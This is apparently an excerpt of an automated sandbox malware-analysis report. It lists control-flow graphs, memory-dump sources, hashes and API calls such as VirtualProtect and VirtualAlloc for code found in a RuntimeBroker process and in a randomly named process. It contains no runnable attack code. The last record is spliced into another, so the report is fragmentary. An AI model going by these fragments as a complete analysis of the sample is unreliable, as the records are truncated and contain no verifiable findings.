                                            control_flow_graph 621 7ffd9b891a35-7ffd9b891aa8 628 7ffd9b891aaa-7ffd9b891ad0 621->628 629 7ffd9b891b02-7ffd9b891b49 621->629 628->629 635 7ffd9b891b4b 629->635 636 7ffd9b891b50-7ffd9b891d26 call 7ffd9b890838 629->636 635->636 661 7ffd9b891d28-7ffd9b891d33 636->661 662 7ffd9b891d3b-7ffd9b891dbc 661->662 665 7ffd9b891dc5-7ffd9b891e2c 662->665 666 7ffd9b891dbe-7ffd9b891dc4 662->666 666->665
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f82a3dba5faae3157dd7383d662aa3767e3ae8ff71f9bacc4b7889d23cce0e4
                                            • Instruction ID: 14a4aff8728b3fdf181f62f8c8fa33e9fdc1c8dfff75cb2774d0aa9e83cfd20c
                                            • Opcode Fuzzy Hash: 2f82a3dba5faae3157dd7383d662aa3767e3ae8ff71f9bacc4b7889d23cce0e4
                                            • Instruction Fuzzy Hash: 15C11571A09A8D9FEB58EB68D8657E97FE1FF58304F0401BEC049D72E2DA782806C741

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 518 7ffd9b8a26fe-7ffd9b8a270b 519 7ffd9b8a2716-7ffd9b8a2727 518->519 520 7ffd9b8a270d-7ffd9b8a2715 518->520 521 7ffd9b8a2729-7ffd9b8a2731 519->521 522 7ffd9b8a2732-7ffd9b8a284b VirtualProtect 519->522 520->519 521->522 526 7ffd9b8a284d 522->526 527 7ffd9b8a2853-7ffd9b8a28a3 522->527 526->527
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8a2000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 198bee5b9da0cc862c274c45d8660b44b51d71d8ffd62e6f03421cceac61c8b0
                                            • Instruction ID: a8b198d7e7f4ad86ba04c7933f2cfb1f03470810241ae8354a7d8e091286b596
                                            • Opcode Fuzzy Hash: 198bee5b9da0cc862c274c45d8660b44b51d71d8ffd62e6f03421cceac61c8b0
                                            • Instruction Fuzzy Hash: 50516C30D0864D8FDB58DFA8C885BE9BBF1FF5A310F1042AAD449E3255DB74A985CB80

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 530 7ffd9b8a40ed-7ffd9b8a4223 VirtualAlloc 535 7ffd9b8a4225 530->535 536 7ffd9b8a422b-7ffd9b8a428f 530->536 535->536
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8a2000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 60af26e9af14c7784470a6da5abda85eeb77c1c14c1e6c838221f98069d9eb68
                                            • Instruction ID: 99c3e20e876ba522754d7804c79cd24bf9c884682d971e528ff1d0e7525b2ab2
                                            • Opcode Fuzzy Hash: 60af26e9af14c7784470a6da5abda85eeb77c1c14c1e6c838221f98069d9eb68
                                            • Instruction Fuzzy Hash: 21515B70908A5C8FDF98EF68C845BE9BBF1FB69310F1041AAD04DE3251DB74A9858F80

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 540 7ffd9b89c4b6-7ffd9b89c4ca 541 7ffd9b89c4d4-7ffd9b89c517 540->541
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >
                                            • API String ID: 0-325317158
                                            • Opcode ID: 6bc67f4a226e8bbd3c4dc4bd85d8488da0f774ae3399aca52f6ca3e1f51a1f7c
                                            • Instruction ID: 2ce279204f916b6e4f229671fe4801d7f21aafb86717f318ab623138e165fdab
                                            • Opcode Fuzzy Hash: 6bc67f4a226e8bbd3c4dc4bd85d8488da0f774ae3399aca52f6ca3e1f51a1f7c
                                            • Instruction Fuzzy Hash: 64F05470D0912E8AEB64EF94C8687A9BAB0EB18304F1155F5D11EA2291DB786A84CE51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 671 7ffd9b8e2a2f-7ffd9b8e2a41 673 7ffd9b8e2a43-7ffd9b8e2a46 671->673 674 7ffd9b8e2a5d-7ffd9b8e2c4f 671->674 675 7ffd9b8e2a4b-7ffd9b8e2a5c 673->675 676 7ffd9b8e2a48 673->676 682 7ffd9b8e2c56-7ffd9b8e2c6e 674->682 683 7ffd9b8e2c51 674->683 675->674 676->675 684 7ffd9b8e2c74-7ffd9b8e2c81 682->684 683->682
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c92a0a9453ac5e88a7e63a3bef826ddab8bacf677d1c678015823b406742a153
                                            • Instruction ID: 3ddbfb23f6e27b87b7fb944b4417d7e950ff0d5556a296c1e8a885c77fd83c6d
                                            • Opcode Fuzzy Hash: c92a0a9453ac5e88a7e63a3bef826ddab8bacf677d1c678015823b406742a153
                                            • Instruction Fuzzy Hash: 3C21B231A0DA4D8FEB69FFA898195E93BA0FF65310F0401BBD419C30E2DA34A545C781

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 734 7ffd9b891afd-7ffd9b891b49 738 7ffd9b891b4b 734->738 739 7ffd9b891b50-7ffd9b891d33 call 7ffd9b890838 734->739 738->739 765 7ffd9b891d3b-7ffd9b891dbc 739->765 768 7ffd9b891dc5-7ffd9b891e2c 765->768 769 7ffd9b891dbe-7ffd9b891dc4 765->769 769->768
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc6eb0b1d5b7db792d76885e1d38657082d49e58c51c4765b04bd1df98dd3eac
                                            • Instruction ID: 0e02d96538caa15dae6ec49869c32e97cba2de61062b7b82b4d4f3ed170aad64
                                            • Opcode Fuzzy Hash: cc6eb0b1d5b7db792d76885e1d38657082d49e58c51c4765b04bd1df98dd3eac
                                            • Instruction Fuzzy Hash: 09A19171A18A8D9FEB98EB68D8657EC7BE1FF58304F4001BED009D32A6DA782405C741

                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b44a12f891fe86d8b1eb699f13ca71f7d357d2f7f5acfb4114d5d4a39cd97498
                                            • Instruction ID: de894350408542f8a43f0f7313fe76ec99450f4d3f803fe76cf61f13df33ee87
                                            • Opcode Fuzzy Hash: b44a12f891fe86d8b1eb699f13ca71f7d357d2f7f5acfb4114d5d4a39cd97498
                                            • Instruction Fuzzy Hash: FD41F370E1991D8FDB98DB58C895AA9B7B1FF58300F5082E9D04DD31A5DE35AD82CF80
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 968aea6b75dc28118faa7ac6096bc9f8644798accf6d02243ad60a916eba8210
                                            • Instruction ID: 56c16107887c4493e0a76f34114f7e64240041a6769201048183d3778019a3e9
                                            • Opcode Fuzzy Hash: 968aea6b75dc28118faa7ac6096bc9f8644798accf6d02243ad60a916eba8210
                                            • Instruction Fuzzy Hash: E4319D70E1991D8FDB98DB58C895AA9B7B1FB58300F5082E9D00DD32A5DE35AD82CF50
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 41cca6ae0a395042e30e3674811d18976008c397fcb7c16671c9b8f5d51012fc
                                            • Instruction ID: b0a40a9d239726f99a3abd22ce4a448419518fbafb51f8aa391648187aad28df
                                            • Opcode Fuzzy Hash: 41cca6ae0a395042e30e3674811d18976008c397fcb7c16671c9b8f5d51012fc
                                            • Instruction Fuzzy Hash: B9210D32A1D2A84ED725BB7C68694EA7FE0EF49229B14017BE4DAC6193DA2491468381
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1d3008589e8892fbc7511fed14dbb5c0c2fb3436a6a8c84dd539ebb59baed619
                                            • Instruction ID: cc5e652a3a60e5a99bf85c53aa172398a1d297b0b4f775a29792ea945031f8a0
                                            • Opcode Fuzzy Hash: 1d3008589e8892fbc7511fed14dbb5c0c2fb3436a6a8c84dd539ebb59baed619
                                            • Instruction Fuzzy Hash: 37310731F0D69E9BDB12BBA8CC252EDBBB0EF45311F064177D025C72D2DA3866068B51
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8dc0a774f94661d6e48beeffef008403e63ebc1c0c421e59902dbab6b891cf56
                                            • Instruction ID: 0ff62bd8f35d77d5df6a69467f7efec67ee6e6618d7b1a6c06df7252986fb33d
                                            • Opcode Fuzzy Hash: 8dc0a774f94661d6e48beeffef008403e63ebc1c0c421e59902dbab6b891cf56
                                            • Instruction Fuzzy Hash: 2E316870A0AA4D8FDB68DF68C8656ED77E1EB98300F11027ED009E3291DA7969458B51
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8de156b253870351f868a6e526e9ef35f8d245c49bda10284b5e6e356248bd85
                                            • Instruction ID: dccd13c056fd7745bf92913365593e51ee432a22723c9415a61f394fe2551454
                                            • Opcode Fuzzy Hash: 8de156b253870351f868a6e526e9ef35f8d245c49bda10284b5e6e356248bd85
                                            • Instruction Fuzzy Hash: A6318D35A1891D8FDF94EF04C865AEDB7B1FB64309F1001EA900EE3265DB759A85CF41
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b71c1f88f5b0418e68c42aeb08218e30c71ef6f27ff29dc93921e134b4acdee
                                            • Instruction ID: dab95d07f37778ab5a62643e244d91b93083be88ab7877be648b9c6be593346c
                                            • Opcode Fuzzy Hash: 0b71c1f88f5b0418e68c42aeb08218e30c71ef6f27ff29dc93921e134b4acdee
                                            • Instruction Fuzzy Hash: 8721C031A0964D8FDB18DF48C8646ED77F1FF98310F11027AD40AE3291DA38AA15CB92
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7bd7bba3921d9bb822c6132d136071ffd7d41116e4226e01da2dd66aa25403b4
                                            • Instruction ID: 982ceacc1f469d2d4ab927ee102e84ad4d9b1d87d6959e39e2e821bb33eb3b7a
                                            • Opcode Fuzzy Hash: 7bd7bba3921d9bb822c6132d136071ffd7d41116e4226e01da2dd66aa25403b4
                                            • Instruction Fuzzy Hash: 42213B34E4960D8FEB68DF84C8647BCB7B1FB98301F5102BED009A7291CB782A85CB40
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 81f23bc3f6cf1898d5d49f1232ec61a3c68ef9c76b494f17625ca8667c4b7ca3
                                            • Instruction ID: c64e956e05f02f8d18cd6d4667bdcd06f4588d434a612ffadbbb5b5b700ce73e
                                            • Opcode Fuzzy Hash: 81f23bc3f6cf1898d5d49f1232ec61a3c68ef9c76b494f17625ca8667c4b7ca3
                                            • Instruction Fuzzy Hash: 0C118F32A0E6CD4FDB56CF649C659B87BB0EF66301B0602FBD058C71A2CA65AA44C781
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa87109d89ab3a9fa034edefc689ea6a7d5ad865ca5c9db97e3f0e20f0700f05
                                            • Instruction ID: b9033c83898eac9a6c4ab4ba3a0e4f8c7fba280d1df7da1a080e4ddb3b8859f5
                                            • Opcode Fuzzy Hash: aa87109d89ab3a9fa034edefc689ea6a7d5ad865ca5c9db97e3f0e20f0700f05
                                            • Instruction Fuzzy Hash: 84119634A1952D8FDFA9DB48C895AA8B3B6FF59301F1041E9D00EE7261CB75AE80CF40
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c45ce9c01ccd36a34152d1b526bf79273b5055f391eb20708da26ba687ab8f6d
                                            • Instruction ID: b8824da7f9f6533344147f5e2033c5134972095a8fdbc68c922b55df6b5b4214
                                            • Opcode Fuzzy Hash: c45ce9c01ccd36a34152d1b526bf79273b5055f391eb20708da26ba687ab8f6d
                                            • Instruction Fuzzy Hash: 2011BF36A0865E8FEB55EF58D8555FD37E0FF58314B04067BD40DC7192DA34AA41CB81
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 26c9518c171e9608ef749a23df4cd1d00c37a94b5921de06e2009442dcbb5beb
                                            • Instruction ID: 3bf88252d7c337e4e8e3bff846b56b1d45c69af0b00cd567307207406be0e26b
                                            • Opcode Fuzzy Hash: 26c9518c171e9608ef749a23df4cd1d00c37a94b5921de06e2009442dcbb5beb
                                            • Instruction Fuzzy Hash: 2F21B834A1951D8FCBA9DB48C895AA8B3B5FF59301F5001E9D00DE7261CB71AE80CF40
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 49f9a25965a9916dfff64e9d0bc3f190392675e5f15922ded998357502add174
                                            • Instruction ID: b4930aa8fd586fa7f8c067255e41c3c077d7fd853267674dfc558f05d30ed93c
                                            • Opcode Fuzzy Hash: 49f9a25965a9916dfff64e9d0bc3f190392675e5f15922ded998357502add174
                                            • Instruction Fuzzy Hash: 49118E3194E7C98FDB56AFB088641A43FB0EF1A201B0A41EBD489CB0B3D9682949C321
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f6f1749f2e2e6584f8be3f1e1df3cc4f5722efec21fcce2bd7d1f193323b522f
                                            • Instruction ID: c05503e8376347aabeb7338e68088085e830b4b5aecca4bc989970af9f4c5502
                                            • Opcode Fuzzy Hash: f6f1749f2e2e6584f8be3f1e1df3cc4f5722efec21fcce2bd7d1f193323b522f
                                            • Instruction Fuzzy Hash: 4E018272A1A94D8FDF68DFA898A15FC7761FFA8310B14066AD01CC31A1DE35AA51C780
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 04cb220ac761ff5cfd3bf8fa9ff169891277d4cea2994c7c62da16e59d25f715
                                            • Instruction ID: 92598f7dce1567d55060090d805a7b33d6ae3db9e8642c992c95336874ff8100
                                            • Opcode Fuzzy Hash: 04cb220ac761ff5cfd3bf8fa9ff169891277d4cea2994c7c62da16e59d25f715
                                            • Instruction Fuzzy Hash: F6210B70E0950DCBDB18EB85D8946ADB7F2FF98315F148235D009972A9DB38A946CB40
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a9b31c01a781c1e97bbb25bd15b3447648b558c0f9479d20d67fe8203e63adaf
                                            • Instruction ID: a055ffe0e4a57d5818f3b3e2d93903f6d9ec621a09db48435a95ccc758c69606
                                            • Opcode Fuzzy Hash: a9b31c01a781c1e97bbb25bd15b3447648b558c0f9479d20d67fe8203e63adaf
                                            • Instruction Fuzzy Hash: 2111E87090968D8FCF85EF68C858AE97FF0FF29305F0505AAE458D7261D7349554CB81
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 115c6b1c0d2bd7c96b7320c3c69cba25279d710b234647ddbe9112937f078f0b
                                            • Instruction ID: 5a5afdb9647d3e82e2f743d5a66475c79d1553913a72bd0e6f57e46ac0deb1d2
                                            • Opcode Fuzzy Hash: 115c6b1c0d2bd7c96b7320c3c69cba25279d710b234647ddbe9112937f078f0b
                                            • Instruction Fuzzy Hash: 85110370908A8D8FCB85EF68C858AA97BF0FF29300F0501AAE418D72A2DB74D554CB81
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9fd0f26842afba345b58784160ab24a9770dc9f1773fb4bbfb2ae251c7e1f77d
                                            • Instruction ID: 7453a47cd10448c676df9730b78d12bb6a30bbe0bc3959314435d199717a2656
                                            • Opcode Fuzzy Hash: 9fd0f26842afba345b58784160ab24a9770dc9f1773fb4bbfb2ae251c7e1f77d
                                            • Instruction Fuzzy Hash: 28113C3090868D8FCF45EF68C898AEA7BF0FF29304F0506AAE419C7161DB34A554CB81
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ce00e07267019944256ecd382facef3e0e534c2919e0d8e890ebe3370c56a98
                                            • Instruction ID: 617b547eb19c4e201db8f92e011883d559f8945ddc0ed5bb43e6e1354b923ba5
                                            • Opcode Fuzzy Hash: 5ce00e07267019944256ecd382facef3e0e534c2919e0d8e890ebe3370c56a98
                                            • Instruction Fuzzy Hash: CD112170E0964D8EEBA9EB988455BACB7F1FF5C300F1581B6C00DA3261DA386E858F41
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f53d1b480a2165e9b4e6dc2aec76644278f72fba1647e4b03dc57bee13811e6e
                                            • Instruction ID: f447a357de89c09c81e37fe6f0e46d8750bced1f947b9eb76cefcc9458344c33
                                            • Opcode Fuzzy Hash: f53d1b480a2165e9b4e6dc2aec76644278f72fba1647e4b03dc57bee13811e6e
                                            • Instruction Fuzzy Hash: B0014C31A0968D8FCB85DF68C858AAE7BB0FF69300F05069BD418D71A1D7349A54CB81
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c93607edd358d02fb3d46c7c584f61009de59f0cb3b00781f9b463837ac245a
                                            • Instruction ID: f8b910d129c45c7337666be9d7e0f7497426d919218c5c3a79d1c4fcd512f5bf
                                            • Opcode Fuzzy Hash: 7c93607edd358d02fb3d46c7c584f61009de59f0cb3b00781f9b463837ac245a
                                            • Instruction Fuzzy Hash: E1111870A19A1D9FDB64DF84C4A0BECB7B2FB59311F2045A9D40E936A1CA382A81CB50
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60fe53a97334519e3f00ae7efb896822038bdfb10ae04dfa867ac86fdb9455f4
                                            • Instruction ID: c858eb81908ec9b8f4abe22a515c95207395c0d6ac9b5f7ebdba4595c31e6227
                                            • Opcode Fuzzy Hash: 60fe53a97334519e3f00ae7efb896822038bdfb10ae04dfa867ac86fdb9455f4
                                            • Instruction Fuzzy Hash: CD01403090968C8FCB45DF18C859AD97FF0FF69304F05019AD408C71A2D7359954CB41
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e00006a3fd54c1519d46abe314bf4e13e112bfa9e45ca2d676c68707801c3d3b
                                            • Instruction ID: 3e2326c356a19fd3a542487c710f366e1e7e6430afcc9da35622c0fe424fb1f3
                                            • Opcode Fuzzy Hash: e00006a3fd54c1519d46abe314bf4e13e112bfa9e45ca2d676c68707801c3d3b
                                            • Instruction Fuzzy Hash: A701DA7091494D8FDF85EF58C849AEE77F0FB68305F00456AA81DD3260DB34A594CB81
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61bc5143558074cd050a3b3a005e1cdce79b61e9d2b57490d61df3975219b01d
                                            • Snapshot File: hcaresult_49_2_7ffd9b8a0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0007e1b84e3ccab852ab16d94c6f4f43cf82396447f0a3c00b4896ab247f84b6
                                            • Instruction ID: 77cea8b73891acdd2257816faa00ee49fb7290c45c9fb49f540f588c54913cf2
                                            • Opcode Fuzzy Hash: 0007e1b84e3ccab852ab16d94c6f4f43cf82396447f0a3c00b4896ab247f84b6
                                            • Instruction Fuzzy Hash: F2F05E70E2555A8AE7A8DF08C8646FE6271EF84344F0102F6901CA31A6DE342E818B40